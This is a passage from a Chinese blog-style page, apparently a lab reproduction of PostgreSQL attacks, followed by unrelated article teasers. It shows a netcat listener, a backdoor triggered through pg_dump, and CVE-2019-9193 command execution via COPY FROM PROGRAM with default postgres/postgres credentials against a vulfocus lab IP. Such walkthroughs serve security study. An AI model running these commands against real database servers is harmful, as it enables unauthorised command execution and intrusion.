      5. 监听端口nc -lvvp 1234

      6. 模仿超级管理员使用ps_dump命令:docker_compose exec postgres pg_dump -U postgres -f evil.bak vulhub,后门被触发

        1. image
    2. 高权限提权
      1. 介绍
        1. PostgreSQL是一个功能强大对象关系数据库管理系统(ORDBMS)。由于9.3增加一个“COPY TO/FROM PROGRAM”功能。这个功能就是允许数据库的超级用户以及pg_read_server_files组中的任何用户执行操作系统命令
      2. 影响版本
        1. 9.3-11.2
      3. 复现

        1. 靶场:vulfocus postgresql 命令执行 (cve-2019-9193)123.58.224.8:31404 31404:5432

        2. 连接postgres/postgres数据库

        3. 删除一个可能存在的函数DROP TABLE IF EXISTS cmd_exec

          1. image

        4. 创建执行命令CREATE TABLE cmd_exec(cmd_output text);

          1. image

        5. 执行系统命令COPY cmd_exec FROM PROGRAM 'whoami'

          1. image

        6. 将结果显示出来SELECT * FROM cmd_exec

          1. image

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/429517.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

安全帽佩戴识别摄像机:守护安全的智能之眼

安全帽佩戴识别摄像机:守护安全的智能之眼

在现代工业和建筑等诸多领域中&#xff0c;安全始终是重中之重。每一处施工现场、每一个生产车间都潜藏着可能对人员造成伤害的风险因素。而安全帽&#xff0c;作为保护工作人员头部免受伤害的关键装备&#xff0c;其是否被正确佩戴就显得尤为关键。此时&#xff0c;安全帽佩戴…
阅读更多...
智创未来,景联文科技提供全方位数据采集服务

智创未来,景联文科技提供全方位数据采集服务

随着科技的日新月异&#xff0c;人工智能技术正在改变我们的生活与工作方式&#xff0c;数据成为推动人工智能&#xff08;AI&#xff09;技术发展的基石。 高质量的数据对于训练机器学习模型、提升算法性能以及实现智能应用的广泛部署至关重要。 景联文科技凭借卓越的技术实力…
阅读更多...
Kafka 为什么这么快?

Kafka 为什么这么快?

Kafka 是一款性能非常优秀的消息队列&#xff0c;每秒处理的消息体量可以达到千万级别。今天来聊一聊 Kafka 高性能背后的技术原理。 1 批量发送 Kafka 收发消息都是批量进行处理的。我们看一下 Kafka 生产者发送消息的代码&#xff1a; private Future<RecordMetadata>…
阅读更多...
PowerMill 2025简体中文版百度云资源分享下载

PowerMill 2025简体中文版百度云资源分享下载

如大家所了解的&#xff0c;PowerMill是一款专业的CAM&#xff08;计算机辅助制造&#xff09;软件。主要用于加工行业&#xff0c;可以帮助用户进行高效、精准的加工工艺设计和数控编程&#xff0c;以达到生产部件的高精度和高质量。 对于初次接触的小伙伴来说&#xff0c;目…
阅读更多...
GAMES101(15节)

GAMES101(15节)

Irradiance辐射度量学 辐射度量学在渲染领域&#xff0c;可以帮助理解基于物理的光照模型 radiant energy辐射能量Q&#xff0c;累计总能量&#xff08;单位J joule焦耳&#xff09;&#xff0c;就像太阳能板&#xff0c;光照时间越长接收能量越多&#xff0c;收到的能量总和…
阅读更多...
前后端分离,使用MOCK进行数据模拟开发,让前端攻城师独立于后端进行开发

前后端分离,使用MOCK进行数据模拟开发,让前端攻城师独立于后端进行开发

mock是什么 Mock生成随机数据,拦截Ajax 请求&#xff0c;前后端分离&#xff0c;让前端攻城师独立于后端进行开发。 增加单元测试的真实性 通过随机数据,模拟各种场景。 在实际开发过程中&#xff0c;前端是通过axios来请求数据的&#xff0c;很多时候前端开发者就是通过写固定…
阅读更多...
浅谈Spring Cloud:OpenFeign

浅谈Spring Cloud:OpenFeign

RestTemplate 方式调用存在的问题&#xff1a; String url "http://userservice/user/" order.getUserId(); User user restTemplate.getForObject(url, User.class); 这是通过URL地址来访问的。但是&#xff1a; 代码可读性差&#xff0c;编程体验不统一参数复…
阅读更多...
Lucene详解介绍以及底层原理说明

Lucene详解介绍以及底层原理说明

文章目录 什么是Lucene?示意图Lucene 的使用场景&#xff1a;Lucene 的生态系统&#xff1a; 相关概念1. **Document&#xff08;文档&#xff09;**2. **Field&#xff08;字段&#xff09;**3. **Analyzer&#xff08;分析器&#xff09;**4. **Tokenizer&#xff08;分词器…
阅读更多...
前端基础知识+算法(一)

前端基础知识+算法(一)

文章目录 算法二分查找条件注意方式基本原理左闭右闭正向写法 左闭右开正向写法 前端基础知识定时器及清除盒子垂直水平居中的方式垂直水平1.flex布局2.grid布局3.定位对于块级元素 解决高度塌陷的方式1.给父元素一个固定的高度2.给父元素添加属性 overflow: hidden;3.在子元素…
阅读更多...
深度学习-从零基础快速入门到项目实践,这本书上市了!!!

深度学习-从零基础快速入门到项目实践,这本书上市了!!!

此书地址&#xff1a; 《【2024新书】深度学习 从零基础快速入门到项目实践 文青山 跟我一起学人工智能 机器学习算法原理代码实现教程 深度学习项目分析 深度学习 从零基础快速入门到项目实践》【摘要 书评 试读】- 京东图书 除深度学习外我还写了一本软件测试书。我大概是国…
阅读更多...
[Excel VBA办公]如何使用VBA批量删除空行

[Excel VBA办公]如何使用VBA批量删除空行

在处理Excel数据时&#xff0c;空行可能会干扰数据分析和展示。以下是一个VBA代码示例&#xff0c;帮助你批量删除工作表中的空行。 1. 代码说明 此代码将遍历指定工作表&#xff0c;删除所有空行&#xff0c;确保数据整洁。 2. VBA代码 删除sheet1的空行 Sub DeleteEmptyRow…
阅读更多...
VMware虚拟机因磁盘空间不足黑屏无法登录

VMware虚拟机因磁盘空间不足黑屏无法登录

在虚拟机里存储了一些文件之后&#xff0c;再打开发现进不去了&#xff0c;只有光标一直在左上角&#xff0c;登录的框都是黑的&#xff0c;具体如下&#xff1a; 明明知道登录框的存在却怎么也触碰不到它T_T &#xff0c;先说解决方法&#xff1a; 产生这个问题的原因是因为磁…
阅读更多...
大数据Flink(一百二十一):Flink CDC基本介绍

大数据Flink(一百二十一):Flink CDC基本介绍

文章目录 Flink CDC基本介绍 一、什么是CDC 二、CDC的实现机制 三、​​​​​​​​​​​​​​传统 CDC ETL 分析 四、​​​​​​​​​​​​​​基于 Flink CDC 的 ETL 分析 五、​​​​​​​​​​​​​​什么是 Flink CDC 六、​​​​​​​​​​​​​​…
阅读更多...
OpenCV特征检测(10)检测图像中直线的函数HoughLinesP()的使用

OpenCV特征检测(10)检测图像中直线的函数HoughLinesP()的使用

操作系统&#xff1a;ubuntu22.04 OpenCV版本&#xff1a;OpenCV4.9 IDE:Visual Studio Code 编程语言&#xff1a;C11 算法描述 在二值图像中使用概率霍夫变换查找线段。 该函数实现了用于直线检测的概率霍夫变换算法&#xff0c;该算法在文献 181中有所描述。 HoughLines…
阅读更多...
go webapi上传文件

go webapi上传文件

一、导入依赖 import "net/http" 我这里用到了Guid所以安装依赖 go get github.com/google/uuid 二、main.go package mainimport ("fmt""github.com/jmoiron/sqlx""github.com/tealeg/xlsx""log""path/filepath&q…
阅读更多...
Cpp类和对象(中续)(5)

Cpp类和对象(中续)(5)

文章目录 前言一、赋值运算符重载运算符重载赋值运算符重载赋值运算符不可重载为全局函数前置和后置的重载 二、const修饰成员函数三、取地址及const取地址操作符重载四、日期类的实现构造函数日期 天数日期 天数日期 - 天数日期 - 天数日期类的大小比较日期类 > 日期类日…
阅读更多...
【CSS in Depth 2 精译_036】5.6 Grid 网格布局中与对齐相关的属性 + 5.7本章小结

【CSS in Depth 2 精译_036】5.6 Grid 网格布局中与对齐相关的属性 + 5.7本章小结

当前内容所在位置&#xff08;可进入专栏查看其他译好的章节内容&#xff09; 第一章 层叠、优先级与继承&#xff08;已完结&#xff09; 1.1 层叠1.2 继承1.3 特殊值1.4 简写属性1.5 CSS 渐进式增强技术1.6 本章小结 第二章 相对单位&#xff08;已完结&#xff09; 2.1 相对…
阅读更多...
桶排序和计数排序(非比较排序算法)

桶排序和计数排序(非比较排序算法)

桶排序 桶排序是一种基于分配的排序算法&#xff0c;特别适合用来排序均匀分布的数据。它的基本思想是将输入的数据分到有限数量的桶里&#xff0c;然后对每个桶内的数据分别进行排序&#xff0c;最后再将各个桶内的数据合并得到最终的排序结果。(通常用于浮点数&#xff0c;因…
阅读更多...
Go-知识-定时器

Go-知识-定时器

Go-知识-定时器 1. 介绍2. Timer使用场景2.1 设定超时时间2.2 延迟执行某个方法 3. Timer 对外接口3.1 创建定时器3.2 停止定时器3.3 重置定时器3.4 After3.5 AfterFunc 4. Timer 的实现原理4.1 Timer数据结构4.1.1 Timer4.1.2 runtimeTimer 4.2 Timer 实现原理4.2.1 创建Timer…
阅读更多...
【Godot4.3】基于状态切换的游戏元素概论

【Godot4.3】基于状态切换的游戏元素概论

提示 本文的设想性质比较大,只是探讨一种设计思路。完全理论阶段&#xff0c;不可行就当是闹了个笑话O(∩_∩)O哈哈~但很符合我瞎搞的气质。 概述 一些游戏元素&#xff0c;其实是拥有多个状态的。比如一个宝箱&#xff0c;有打开和关闭两个状态。那么只需要设定两个状态的图…
阅读更多...
最新文章
推荐文章

Copyright @ 2022~2023

友情链接: 我的编程经验分享 一条长河网 尧图网站开发